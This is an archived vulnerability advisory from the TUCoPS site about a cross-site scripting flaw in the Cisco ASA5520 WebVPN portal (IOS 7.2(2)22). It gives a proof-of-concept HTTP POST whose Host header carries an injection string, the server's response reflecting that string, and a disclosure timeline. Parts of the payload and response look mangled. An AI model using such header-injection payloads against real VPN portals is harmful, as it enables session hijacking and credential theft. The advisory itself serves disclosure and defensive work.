Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Cisco :: va3023.htm

Cisco ASA5520 Web VPN Host Header XSS
Cisco ASA5520 Web VPN Host Header XSS
Cisco ASA5520 Web VPN Host Header XSS

- Cisco ASA5520 Web VPN Host Header XSS

- Description

Cross-site scripting.

- Product

Cisco, ASA5520, IOS 7.2(2)22

- PoC

Modified request:

POST /+webvpn+/index.html HTTP/1.1
Host: "'>content='" 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/,
application/, application/msword, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66



HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Content-Length: 5556

"http://"'> httpequiv="" 
content='"" on 
"2000.11.02T23:36-0800" r (n 0 s 0 v 0 l 0))'>

WebVPN Service

- Solution


- Timeline

2007-09-17: Vulnerability Discovered
2008-02-15: Disclosed to Vendor (auto-reply)
2009-04-02: Disclosed to Public (XSS is so 1999)


Shared Vulnerability Disclosure Account

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH